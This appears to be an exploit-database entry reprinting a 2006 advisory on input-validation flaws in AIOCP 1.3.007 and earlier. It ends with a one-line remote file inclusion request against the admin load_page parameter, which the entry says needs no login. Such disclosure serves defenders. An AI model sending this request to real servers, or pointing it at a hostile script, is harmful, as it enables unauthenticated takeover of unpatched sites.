AIOCP 1.3.x - load_page Remote File Inclusion

2006-11-06T00:00:00
ID EXPLOITPACK:000EA6E1BCD42047FDC09EBE78A6A828
Type exploitpack
Reporter laurent gaffie
Modified 2006-11-06T00:00:00

Description

AIOCP 1.3.x - load_page Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/20931/info
    
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
    
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
    
AIOCP 1.3.007 and prior versions are vulnerable.

/admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include )